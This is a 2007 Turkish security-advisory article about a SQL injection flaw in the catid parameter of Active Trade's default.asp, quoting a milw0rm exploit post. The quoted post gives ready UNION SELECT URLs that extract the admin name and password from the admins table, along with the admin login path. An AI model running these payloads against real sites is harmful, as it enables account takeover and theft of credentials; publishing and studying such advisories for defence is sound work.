URL: http://www.olympos.org/article/articleprint/2196/-1/7/active_trade_catid_sql_injection_acigi

Active Trade catid SQL Injection açığı
Google
Ana sayfa Haberler Güvenlik Açıkları Kod Güvenliği

Yazar: Ertan Kurt

Yayınlanma tarihi: 26.03.2007 11:14

CyberGhost tarafından rapor edilen açık SQL sorgu ekleme saldırılarına izin veriyor.

default.asp dosyasında catid parametresine eklenen girişler doğru olarak kontrol edilmiyor. Bu sayede SQL sorgularında değişiklik yaparak istenilen SQL kodunu çalıştırmak mümkün olabiliyor.

Açığın 2 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.

Çözüm:
Kaynak kodunda düzenleme yaparak doğru filtrelemenin yapıldığına emin olun.

Ref:
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32

#Vuln.

#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]

Alıcının eposta adresi:

*

Eposta adresiniz:

*



| Normal sayfa görünümüne dönüş | Bu makaleyi arkadaşına gönder |